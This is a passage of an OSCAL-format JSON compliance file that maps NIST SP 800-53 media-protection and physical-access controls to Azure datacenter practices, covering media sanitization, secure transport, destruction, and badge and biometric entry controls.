Non-digital media is not used by Azure in the datacenter environment. Facilities define controlled areas as appropriate for their footprint and layout. Any areas containing digital media assets are considered controlled regardless of facility layout and are protected by the physical and environmental controls._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"a3d16e42-51e2-4c1e-9da9-a88300ed3eac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-4_smt.b","by-components":[{"uuid":"e07e6e65-1367-421d-9847-161e246f4920","export":{"provided":[{"uuid":"3c2ba19b-fe1f-4a3d-a120-f776102f565b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-010"}],"description":"Azure digital media assets are protected in Azure datacenters and GC3s through physical access controls and logical access controls for the lifetime of the asset. Azure assets are cleared, purged, or destroyed with methods consistent with NIST SP 800-88 Revision 1 prior to the asset's reuse or disposal. Azure utilizes data erasure units from Blancco. Blancco supports NIST SP 800-88 requirements for cleansing and purging/secure erasure. 
For asset destruction, Azure utilizes onsite asset destruction services._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e5e41597-41f5-42cb-8297-f35d14d08816","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-5","statements":[{"uuid":"67e4d8a3-539b-49dc-95f7-fab620d935f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-011"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.a","by-components":[{"uuid":"051611e4-96b1-49e8-9525-a48579ee634c","export":{"provided":[{"uuid":"96ec695a-3de7-4391-8c37-c44a7c9f0492","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-011"}],"description":"Digital media at Azure datacenters consist of servers, network devices, and magnetic tapes. Azure datacenters do not use non-digital media. Azure utilizes secure transport and data deletion to protect media that is being transported outside the datacenter._x000D_ _x000D_ All media being transported from Azure datacenters require accurate tracking. Tickets are created to arrange and track the transportation of media. Azure has contracted with several approved vendors to provide secure shipping services. Secure Transport begins with an accurate inventory and chain of custody. Authorized asset managers are required to manage the exchange of assets. Assets are inventoried at the time of delivery to the transporter. Requirements for transporting an asset are defined according to their asset classification and data classification. If data is required to be intact, an approved policy exception request is required. 
The asset manager must witness the container being locked and a tamper-proof seal applied. Secure Transport may carry additional requirements, such as a dedicated transport for only Microsoft assets, GPS tracking, and only stopping at Microsoft locations. In cases of longer transport routes, the requirement could be that there are multiple drivers and trucks with sleeping quarters to provide for non-stop delivery. At the delivery location, the transport company's approved personnel must be present to witness the removal of the tamper-proof seal and unlocking of the container. The receiving personnel inventory the shipment and send a message confirming the receipt of the assets. This inventory is validated by the Microsoft asset manager._x000D_ _x000D_ Azure contracts with a vendor to provide equipment destruction. All assets are required to be destroyed onsite. Azure assets are cleansed/purged with methods consistent with NIST SP 800-88 prior to reuse. Prior to cleansing or destruction, an inventory is created by Datacenter Logistics. 
If a vendor is used for destruction, the vendor provides a certificate of destruction for each asset destroyed, which is validated by the asset manager."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7e3c893d-61ab-4388-bdff-043977d6539f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-012"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.b","by-components":[{"uuid":"068c4871-d28a-4345-b908-918b53dec8c7","export":{"provided":[{"uuid":"92d21fb4-bd99-44ff-99a7-7128727f5e54","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-012"}],"description":"Azure maintains accountability for assets leaving the datacenter consistent with NIST SP 800-88: consistent cleansing/purging, asset destruction, encryption, accurate inventorying, tracking, and protection of chain of custody during transport."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"3af14d35-bc30-471b-9d47-de6a0530aa75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-013"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.c","by-components":[{"uuid":"60b94408-24d8-4a04-9be8-ac5d907d2a85","export":{"provided":[{"uuid":"df278ac9-cd0c-4106-a3b7-b38398fb43c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-013"}],"description":"Azure restricts the activities of asset transport to authorized personnel through the protection of the chain of custody. 
The use of locks and tamper-proof seals, together with the required validation of asset inventories, ensures that only authorized personnel are involved in the asset transport."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7d8d3565-211b-4441-b9ab-36e264c4e7db","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-014"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.d","by-components":[{"uuid":"609f5800-99ab-41fa-b41d-fa6cf4c12122","export":{"provided":[{"uuid":"fdf03952-cadb-4c02-9608-489b03d675f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-014"}],"description":"The transport of Azure digital media outside of the Azure security-controlled space requires the supervision of two Datacenter Operations (DCOPs) team members. The assets are accompanied and supervised at all times by authorized personnel until they are destroyed. 
The DPS team utilizes Iron Mountain and Azure Cool Storage for storage of media that contains valid, unexpired data."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"0a8261ae-f841-48cc-b2a4-c4b0ad256ac1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6","statements":[{"uuid":"3626be1d-3cab-4ab3-b2a0-51ee4a29e655","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-015"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6_smt.a","by-components":[{"uuid":"bb7c899a-9f2c-43c7-92f0-b56c76a8b618","export":{"provided":[{"uuid":"d5d01652-1ade-4056-8833-653619e9e0c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-015"}],"description":"In Azure datacenters, Azure digital media is sanitized using approved tools and in compliance with customer requirements, including NIST Special Publication 800-88 Revision 1, prior to being reused. Non-digital media is not used by Azure in the datacenter environment. All data bearing devices (DBDs) used by Azure are shredded by an approved ITAD Vendor or customer per customer standards on site. No DBDs leave the Azure datacenters. 
If hardware is considered volatile and deemed returnable to the supplier, it is shipped out via the standard RMA process as outlined in the Sparing and RMA Strategy."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"4e31f887-e551-4046-8047-44524cfb397b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-016"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6_smt.b","by-components":[{"uuid":"96f4bc61-be7f-4d0e-b509-9e3de88ecdba","export":{"provided":[{"uuid":"0aa4428e-6929-4021-8604-cfd7b1a54c15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-016"}],"description":"Azure uses data erasure units and processes to sanitize data in compliance with customer requirements, including NIST Special Publication 800-88 Revision 1, which are commensurate with the Azure asset classification of the asset. 
For assets requiring destruction, Azure utilizes onsite asset destruction services."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"7f156757-b000-4d37-b224-57510b8619a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.1","statements":[{"uuid":"d5115626-57b7-4257-87d0-79db080861ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-017"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.1_smt","by-components":[{"uuid":"7b534cf4-28cc-4029-b72d-bd261cd38614","export":{"provided":[{"uuid":"cb8260ec-4fe3-4ae3-bb6e-97b1b708950e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-017"}],"description":"Digital media at Azure datacenters hosting the Azure environment consist of servers, network devices, and physical hard disks. Azure datacenters do not use non-digital media.\n\nDigital media within Azure is not allowed to be transported from the Azure location unless it is being destroyed. Assets that are to be destroyed are stored in locked storage bins. At the time of destruction and under CCTV supervision, Azure digital media is removed from the locked storage bin and scanned to log the serial number of the asset to be destroyed. The asset is shredded while being supervised by cleared personnel. 
The destruction vendor issues a certificate of destruction for the assets that were destroyed."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"170d6c90-6c80-4466-936f-767558dbdc5f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.2","statements":[{"uuid":"55557046-431d-438d-af51-7a56889a93ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-018"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.2_smt","by-components":[{"uuid":"9decc92d-36de-4c52-8be9-c33553bfedda","export":{"provided":[{"uuid":"832d2ad0-7105-4e28-ab30-322845d52e83","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-018"}],"description":"Azure uses data erasure units and processes to sanitize data in compliance with NIST SP 800-88 Revision 1 before media is reused. Every one hundred and eighty (180) days, the Cyber Defense Operations Center (CDOC) tests the Azure data erasure units and the process for erasure. 
In the test, Cloud Operations + Innovation Engineering (CO + IE) verifies that the intended sanitization is being achieved through a forensic analysis of tested hard drives to confirm that the data has been sanitized by the data erasure units."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"62bf6d14-2763-45e6-8273-12012e75b97a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.3","statements":[{"uuid":"39298355-a6bd-4e63-900e-9bfcf038b477","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-019"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.3_smt","by-components":[{"uuid":"02b66f07-7883-47e5-ad79-de507deebd8d","export":{"provided":[{"uuid":"45e0aef4-c25c-4d71-9ccc-29fae59f0db8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-019"}],"description":"To prevent the infection of Azure by malware on portable storage devices, Azure datacenters follow the Tools and Removable Media Security Procedure in the Datacenter Services Run Book. 
The procedure specifies that the following actions be taken with USB drives before use in the Azure environment:\n\n* Format the USB drives when the drives are first purchased from the manufacturer or vendor, before the initial use or when being reused for a different tool.\n* Scan any USB drive to be used in an Azure-designated area for malware, before taking the drive into the area.\n* After using a drive within an Azure-designated area, format the drive before leaving the area.\n\nThe Tools and Removable Media Security Procedure also requires that all lost, discarded, stolen or misplaced thumb drives never be re-introduced into Azure, but that they be instead cataloged and destroyed."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5f74a971-9c9e-4f77-bbd0-c29fe1a353a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-7","statements":[{"uuid":"93b3e647-ceaf-4e15-bb3c-1a8f2e8ddd1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-7_smt.a","by-components":[{"uuid":"ebfa0ce8-cf4b-4289-bb5a-84cf24083c16","export":{"provided":[{"uuid":"c58e8414-076c-4de4-8895-afe73a91f8f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-020"}],"description":"Asset owners are required to assign their assets with an asset classification and no assets are exempt from this requirement. In the Azure datacenters and GC3s, assets refer to servers and network devices. 
Other digital media like USB flash/thumb drives or CDs/DVDs are managed by specific policies and procedures, including the Asset Management section of the Microsoft Security Program Policy (MSPP), governing how those devices are managed. Non-digital media is not used. The usage of digital media in Azure datacenters and GC3s is monitored twenty-four (24) hours a day, seven (7) days a week via CCTV coverage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"b392f66c-403b-41d9-9a1f-41f1f02fd923","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-7_smt.b","by-components":[{"uuid":"cf581630-fa0e-4fce-88c4-63ca63f96667","export":{"provided":[{"uuid":"92aef83d-4922-4dcb-be0a-576f2e1c948e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-021"}],"description":"Asset owners are required to assign their assets with an asset classification and no assets are exempt from this requirement. In the Azure datacenters and GC3s, assets refer to servers and network devices. All assets have identified owners; no asset is left without an identified owner. Other digital media like USB flash/thumb drives or CDs/DVDs are managed by specific policies and procedures, including the Asset Management section of the Microsoft Security Program Policy (MSPP), governing how those devices are managed. Non-digital media is not used. 
The usage of digital media in Azure datacenters and GC3s is monitored twenty-four (24) hours a day, seven (7) days a week via CCTV coverage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5c2b7959-3c89-452b-b76a-ae8f9b73798a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-2","statements":[{"uuid":"58d03015-1166-4101-a89f-1102bb1f407b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.a","by-components":[{"uuid":"d11f5a1e-ee5b-40b1-913e-c577c947c918","export":{"provided":[{"uuid":"84c7d728-eacb-4342-b144-b3f1ce34298c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-006"}],"description":"Access to an Azure datacenter must be approved by the Datacenter Management (DCM) team through the Datacenter Access Tool (DCAT). On a quarterly basis, the DCM team for each datacenter is required to perform an appropriateness review of the personnel with authorized access to their datacenter. The review consists of reviewing reports from security showing personnel with current access to the datacenter. The DCM determines the access changes to be made and communicates a request to security to have the changes performed. After the changes have been made, the DCM team reviews reports verifying that the changes have been completed. The quarterly access review is documented in a work ticket that includes the reports that were reviewed by the DCM team. These tickets are reviewed as part of quality control, quality assurance process. 
The DC Quarterly Access Review process is documented in the Datacenter Services (DCS) SOP. In between quarterly access reviews, DCAT procedures support the least privilege principle by requiring every access assignment to have an end date. After the end date is reached, access is removed by DCAT. The DCAT termination process can be manual or automatic. Manual scenarios are where a Datacenter Manager or security team member initiates the termination of an individual's DCAT requests. An automatic termination occurs when an individual with a Microsoft alias/domain account has their employment terminated in Microsoft's headcount management tool (HeadTrax). Additionally, when access is no longer required, it is the standard procedure for security officers at the datacenter or the DCM team to manually request the termination of access. The DC Quarterly Access Review is a quarterly true-up of the access list and not the primary control relied upon to keep the access list current.\n\nAzure Third-Party (Leased) Datacenters\n\nThe DCM of a leased datacenter is responsible for conducting the same access review as a fully-managed Azure datacenter. Instead of reviewing the access levels for the entire datacenter, the DCM requests the access list for the Microsoft areas from the datacenter's security team. The DCM is responsible for ensuring that both the landlord's access system and DCAT reflect the same data. The quarterly access review is conducted in the same manner as a fully-managed Azure datacenter.\n\nDCAT requests are used in leased datacenter locations in a slightly different manner from a fully-managed Azure datacenter. The exception is that the approved DCAT request is emailed by the DCM team to the security team at the leased datacenter. 
The leased datacenter security team inputs the approved request into the leased datacenter's access tool."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"c6492eab-dd56-4bc4-a93e-6fc93de161ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.b","by-components":[{"uuid":"2f53908a-3526-485d-8210-b3e0a0a96ff0","export":{"provided":[{"uuid":"308d5a1b-6218-45fb-b848-4a29787c29be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-007"}],"description":"DCAT is the authoritative source listing all personnel with authorized access to a specific datacenter. DCAT is linked with the datacenter's physical security access control devices and authorizes access based on access levels that are approved by the DCM team. Access levels are assigned in DCAT to either a user's Microsoft issued badge or a temporary access badge that is assigned at the datacenter by the Control Room Supervisor (CRS). Access levels are approved by the DCM team. Besides credentials assigned to physical badges, some areas of the datacenter require two-factor authentication employing the user's biometric data (hand geometry or fingerprint) as well as badge authentication to gain authorized entry.\n\nAzure Third-Party (Leased) Datacenters\n\nAt a leased datacenter, DCAT is still considered the authoritative source for access to Microsoft areas within the datacenter. All access request approvals are first processed in DCAT and then emailed to the leased datacenter's security team. 
The leased datacenter's security team only authorizes access to Microsoft areas to individuals with an approved DCAT request. Besides credentials assigned to physical badges, some areas of the datacenter require two-factor authentication employing the user's biometric data (hand geometry or fingerprint) as well as badge authentication to gain authorized entry."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"2be8a5e9-87bb-4b5b-9493-143f6a9f4545","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.c","by-components":[{"uuid":"134051f4-db9a-4bdd-bb7e-70c15bbf0064","export":{"provided":[{"uuid":"7993177a-e0db-4e23-a613-fe06d267f454","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-008"}],"description":"The physical security team and datacenter management team conduct a quarterly access review of the access control list to remove or update individual access as necessary. Terminations are handled immediately through the DCAT termination process. If termination of access to the datacenter is required, the DCM team provides the physical security team notification of the termination request. Once processed, the DCM team verifies access has been terminated in DCAT.\n\nAdditionally, the DCAT system performs real time comparisons of access authorization and automatically removes access when access tickets expire. 
A person with an expired access ticket is escorted back to the Security Operations Center to have their access renewed.\n\nAzure Third-Party (Leased) Datacenters\n\nThe DCM of a leased datacenter is responsible for conducting the same access review as a fully-managed Azure datacenter. Instead of reviewing the access levels for the entire datacenter, the DCM requests the access list for the Microsoft areas from the datacenter's security team. The DCM is responsible for ensuring that both the landlord's access system and DCAT reflect the same data. The quarterly access review is conducted in the same manner as a fully-managed Azure datacenter.\n\nDCAT requests are used in leased datacenters in a slightly different manner from a fully-managed Azure datacenter. The exception is that the approved DCAT request is emailed by the DCM team to the security team at the leased datacenter. The leased datacenter security team inputs the approved request into the leased datacenter's access tool. 
Terminations are handled immediately through the DCAT termination process and communication to the leased datacenter's security team."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"e8a6bdbe-6cc5-447d-b4ff-18f2a4cbb900","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.d","by-components":[{"uuid":"52dbf4f4-a51f-495c-95b7-734066c01b8c","export":{"provided":[{"uuid":"8353b083-e62f-4cf5-bbff-3acbde52813c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-009"}],"description":"The physical security team and DCM team conduct a quarterly review of the access control list to remove or update individual access as necessary. 
Terminations are handled immediately through a DCAT termination process detailed in Part c above."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"0eb72907-6c6d-4af6-96d6-7e240f108aea","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-3","statements":[{"uuid":"083b320b-b62d-49dd-9525-e70c34f01a91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-010"},{"name":"control-origination","value":"system-specific"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-011"}],"statement-id":"pe-3_smt.a","by-components":[{"uuid":"129d551f-9812-4117-a7e1-30f557b733f4","export":{"provided":[{"uuid":"cf39b9bb-94fa-4b3e-b202-ec128c75cd68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-010"}],"description":"Azure enforces physical access authorizations for all physical access points to Azure datacenters. The exteriors of the datacenter buildings are non-descript and do not advertise that they are Microsoft datacenters. Depending on the design of a datacenter, physical access authorizations at Azure datacenters may begin at a controlled perimeter gate or secured facility door that requires either access smart card authorization or security officer authorization. Main access to Azure datacenter facilities is restricted to a single point of entry that is manned twenty-four (24) hours a day, seven (7) days a week by security personnel. Emergency exits are alarmed and under video surveillance. 
Electronic access control devices are installed on doors separating the reception area from the facilities' interior to restrict access to approved personnel only. Azure datacenters have a security operations desk located in the reception area and in line of sight of the single entry point. The datacenter lobbies have man-trap portal devices that require multifactor authentication such as access card and biometric hand geometry or fingerprint authentication to pass beyond the lobby. Areas within Microsoft datacenters that contain critical systems (e.g., colocations, critical environments, Main Distribution Frame (MDF) rooms, etc.) are further restricted through various security mechanisms such as electronic access control, biometric devices, and anti-passback controls. Additionally, doors are alarmed and under video surveillance. Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person arrives at a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the Control Room Supervisor against a Microsoft identification smart card or a valid government issued identification card or document. Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (in leased datacenters), and anti-pass back controls, as well as security officers to control access to datacenters. 
\n\nAzure Third-Party (Leased) Datacenters\n\nThe physical security requirements of a leased datacenter are designed to reflect similar security capabilities of a fully-managed Azure datacenter. As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms."},{"uuid":"b72617e0-2a7a-45f2-8084-923c5eb827d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-011"}],"description":"Azure enforces physical access authorizations for all physical access points to Azure datacenters. The exteriors of the datacenter buildings are non-descript and do not advertise that they are Microsoft datacenters. Depending on the design of a datacenter, physical access authorizations at Azure datacenters may begin at a controlled perimeter gate or secured facility door that requires either access smart card authorization or security officer authorization. Main access to Azure datacenter facilities is restricted to a single point of entry that is manned twenty-four (24) hours a day, seven (7) days a week by security personnel. Emergency exits are alarmed and under video surveillance. Electronic access control devices are installed on doors separating the reception area from the facilities' interior to restrict access to approved personnel only. Azure datacenters have a security operations desk located in the reception area and in line of sight of the single entry point. The datacenter lobbies have man-trap portal devices that require multifactor authentication such as access card and biometric hand geometry or fingerprint authentication to pass beyond the lobby. Areas within Microsoft datacenters that contain critical systems (e.g., colocations, critical environments, Main Distribution Frame (MDF) rooms, etc.) 
are further restricted through various security mechanisms such as electronic access control, biometric devices, and anti-passback controls. Additionally, doors are alarmed and under video surveillance. Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person arrives at a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the Control Room Supervisor against a Microsoft identification smart card or a valid government issued identification card or document. Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (in leased datacenters), and anti-pass back controls, as well as security officers to control access to datacenters.\n\nAzure Third-Party (Leased) Datacenters\n\nThe physical security requirements of a leased datacenter are designed to reflect similar security capabilities of a fully-managed Azure datacenter. 
As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"6a16bdf6-7cf8-4d07-914d-372d72fff3fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-012"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.b","by-components":[{"uuid":"f512e69b-763f-47e0-8202-a86b57248318","export":{"provided":[{"uuid":"a4062ecf-070b-4b2e-bf14-60d26c61ce03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-012"}],"description":"Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the DCM team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person can be granted physical access to a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the security against a Microsoft identification smart card or a valid government issued identification card. 
All accesses to Azure datacenter facilities are logged and audited."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"b7e4b0ce-9efd-45a7-b0d5-667a6ec7bfc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-013"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.c","by-components":[{"uuid":"4c836f7e-1301-4a23-b317-0ea75d5b935e","export":{"provided":[{"uuid":"8beabdbd-8640-4f08-9cd2-2ae37498f9a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-013"}],"description":"Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (at leased datacenter locations), and anti-pass back controls, as well as security officers to control access to datacenters. 
